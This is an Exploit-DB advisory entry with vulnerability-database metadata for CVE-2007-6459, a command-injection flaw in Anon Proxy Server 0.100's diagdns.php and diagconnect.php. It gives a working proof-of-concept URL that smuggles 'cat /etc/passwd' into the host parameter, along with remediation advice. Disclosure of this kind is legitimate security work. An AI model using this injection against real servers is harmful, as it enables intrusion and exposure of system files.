Anon Proxy Server 0.1000 - Remote Command Execution Vulnerability
2007-12-14T00:00:00
ID EDB-ID:4734 Type exploitdb Reporter Michael Brooks Modified 2007-12-14T00:00:00
Description
Anon Proxy Server 0.1000 Remote Command Execution Vulnerability. CVE-2007-6459. Webapps exploit for php platform
By Michael Brooks
Vulnerability type: Multiple Remote System commands execution.
Software: Anon Proxy Server
Home page:http://sourceforge.net/projects/anonproxyserver/
Affects version: 0.100
Example exploit:
http://127.0.0.1/anon_proxy_server_0.100/diagdns.php?host=google.com%5C%27+%26%26+cat+%2Fetc%2Fpasswd+%23
A virtually identical flaw exists in diagconnect.php however it takes longer to execute.
Anon Proxy Server forces magic_quotes_gpc=on, However magic_quotes_gpc does not protect the system() function from taint. For protection you should use the escapeshellarg() function. Removing diagdns.php and diagconnect.php is the best temporary solution. Also magic_quotes_gpc is being removed in php6, so Anon Proxy Server will have to revamp there security.
Peace
# milw0rm.com [2007-12-14]
{"hash": "baf4e9ece638c7ff1df4fd182cd46f2c720d5f85911d23bf862f9b4f60bc211a", "id": "EDB-ID:4734", "lastseen": "2016-01-31T21:38:51", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/4734/", "description": "Anon Proxy Server 0.1000 Remote Command Execution Vulnerability. CVE-2007-6459. Webapps exploit for php platform", "title": "Anon Proxy Server 0.1000 - Remote Command Execution Vulnerability", "sourceData": "By Michael Brooks\nVulnerability type: Multiple Remote System commands execution. \nSoftware: Anon Proxy Server\nHome page:http://sourceforge.net/projects/anonproxyserver/\nAffects version: 0.100\n\nExample exploit:\nhttp://127.0.0.1/anon_proxy_server_0.100/diagdns.php?host=google.com%5C%27+%26%26+cat+%2Fetc%2Fpasswd+%23\n\nA virtually identical flaw exists in diagconnect.php however it takes longer to execute.\n\nAnon Proxy Server forces magic_quotes_gpc=on, However magic_quotes_gpc does not protect the system() function from taint. For protection you should use the escapeshellarg() function. Removing diagdns.php and diagconnect.php is the best temporary solution. Also magic_quotes_gpc is being removed in php6, so Anon Proxy Server will have to revamp there security. \n\nPeace\n\n# milw0rm.com [2007-12-14]\n", "objectVersion": "1.0", "cvelist": ["CVE-2007-6459"], "published": "2007-12-14T00:00:00", "osvdbidlist": ["43712", "43711"], "references": [], "reporter": "Michael Brooks", "modified": "2007-12-14T00:00:00", "href": "https://www.exploit-db.com/exploits/4734/"}
{"cve": [{"lastseen": "2017-09-29T14:25:38", "references": ["http://www.securityfocus.com/bid/26882", "https://www.exploit-db.com/exploits/4734", "http://www.securityfocus.com/archive/1/archive/1/485151/100/0/threaded", "http://securityreason.com/securityalert/3463"], "description": "Anon Proxy Server 0.100, and probably 0.101, allows remote attackers to execute arbitrary commands via shell metacharacters in (1) the host parameter to diagdns.php, and (2) the host parameter and possibly (3) the port parameter to diagconnect.php, a different vulnerability than CVE-2007-6460.", "edition": 2, "reporter": "NVD", "published": "2007-12-19T19:46:00", "title": "CVE-2007-6459", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:25:38", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2007-6459"], "scanner": [], "modified": "2017-09-28T21:29:56", "cpe": ["cpe:/a:anon_proxy_server:anon_proxy_server:0.100"], "id": "CVE-2007-6459", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6459", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
